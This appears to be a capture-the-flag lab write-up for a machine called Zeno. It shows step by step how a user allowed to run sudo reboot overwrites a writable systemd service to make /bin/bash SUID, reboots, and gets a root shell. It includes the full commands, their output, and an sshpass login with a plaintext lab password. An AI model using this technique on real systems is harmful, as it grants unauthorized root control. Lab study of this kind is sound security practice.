InfoSec LAB

Zeno_Privilege_Escalation

Created: 2 min read

Tampering service file and reboot

Upon gaining the lateral movement to the edward user, checking the sudo privilege revealed that the user is able to execute /usr/sbin/reboot command as anyone without getting prompted for password. Under a regular circumstance, it cannot be abused to gain privilege escalation. However, the earlier enumeration also discovered that there is a WRITABLE service, present in the target system; /etc/systemd/system/zeno-monitoring.servicec. This can be leveraged to gain privilege escalation via reboot.

Tampering the service file

bash-4.2$ echo -e "[Unit]\nDescription=Zeno monitoring\n\n[Service]\nType=simple\nUser=root\nExecStart=/usr/bin/chmod +s /bin/bash\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/zeno-monitoring.service
 
bash-4.2$ cat /etc/systemd/system/zeno-monitoring.service
[Unit]
Description=Zeno monitoring
 
[Service]
Type=simple
User=root
ExecStart=/usr/bin/chmod +s /bin/bash
 
[Install]
WantedBy=multi-user.target

Over-writing to the service file; /etc/systemd/system/zeno-monitoring.service The service file now contains /usr/bin/chmod +s /bin/bash, making /bin/bash a SUID binary

Reboot

[edward@zeno system]$ sudo -u root reboot
Connection to 10.10.20.195 closed by remote host.
Connection to 10.10.20.195 closed.

Rebooting..

Privilege Escalation

┌──(kali㉿kali)-[~/archive/thm/zeno]
└─$ sshpass -p 'FrobjoodAdkoonceanJa' ssh edward@$IP                                       
Last login: Tue Aug 13 17:35:46 2024 from ip-10-9-0-243.eu-west-1.compute.internal
-bash-4.2$

SSH’d into the rebooted target system

-bash-4.2$ /bin/bash -p
bash-4.2# whoami
root
bash-4.2# hostname
zeno
bash-4.2# /sbin/ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:63:1d:74:7a:33 brd ff:ff:ff:ff:ff:ff
    inet 10.10.20.195/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 3553sec preferred_lft 3553sec
    inet6 fe80::63:1dff:fe74:7a33/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks